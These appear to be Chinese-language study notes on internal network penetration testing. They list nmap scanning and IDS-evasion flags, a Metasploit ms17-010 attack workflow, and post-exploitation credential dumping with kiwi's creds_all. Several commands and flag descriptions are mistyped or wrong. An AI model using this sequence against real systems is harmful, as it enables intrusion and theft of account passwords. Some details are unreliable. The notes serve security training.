内网安全
一、虚拟机的安装前准备工作
1.光盘映像文件
2.vmware
二、虚拟机配置
1.虚拟机模板配置
修改模板内存为2G
CPU 为2核心
2.虚拟机的三种网卡模式
桥接
NAT
仅主机模式
3.系统常用命令
查看系统IP地址:
windows : ipconfig
kali : ifconfig
打开终端:
Ctrl + Alt + t
打开资源管理器:
win + E
打开运行:
win + R
三、网络安全-内网安全
1、信息收集
nmap的参数
(1)主机发现
-sP ping 扫描
-P0 无ping扫描
-PN SYN同步Ping扫描
-PA ACK ping扫描
-PU UDP ping扫描
-PE ICMP ping扫描
-PR ARP ping扫描
-n 不进行域名解析
-R 进行域名解析(默认使用)
(2)端口扫描
-sS TCP SYS(同步)扫描
-sT TCP 连接扫描
-sU UDP扫描
-sN TCP Null扫描
-sF FIN扫描
-sX Xmas扫描
-sA ACK 扫描
(3)端口说明和顺序扫描
-p 指定扫描端口
(4)版本探测
-sV 服务版本探测
-O/-A 操作系统版本探测
-T{0-5} 默认为3 5快速扫描的同时可能 会牺牲准确性
(5)防火墙/IDS躲避和欺骗
-f 报文分段
-D 诱饵隐蔽扫描
-S 源地址欺骗扫描
2、漏洞扫描
nmap -n -T4 --script=vuln IP地址
3、漏洞利用
工具:msf(美少妇)
流程:
①启动:msfconsole / msfdb run
②搜索漏洞名称:search 漏洞编号 举例:search ms17-010
③使用攻击模块:use 编号或脚本 举例:use 0 或者 use explort....
④设置目标IP、攻击手法、目标操作系统
设置目标IP:set rhosts IP地址
设置攻击手法:set payload 编号
设置目标操作系统:set tag 编号
⑤开始攻击:explort / run
4、攻击成功后
(1)获取系统所有账户用户名和密码
第1步:load kiwi # 加载密码工具
第2步:creds_all # 获取用户名和密码